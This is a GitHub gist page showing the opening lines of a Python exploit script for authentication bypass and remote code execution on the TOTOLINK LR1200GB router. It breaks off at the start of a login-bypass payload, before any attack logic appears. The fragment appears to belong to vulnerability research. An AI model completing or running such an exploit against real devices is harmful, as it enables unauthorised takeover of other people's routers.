Skip to content

Instantly share code, notes, and snippets.

@manishkumarr1017
manishkumarr1017 / exploit.py
Created February 14, 2024 03:16
TOTOLINK LR1200GB Authentication Bypass and RCE
#!/usr/bin/python3
import json
import argparse
import sys
import requests
from colorama import Fore, Style
URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
def login_bypass():
login_bypass_payload = {
"username": username,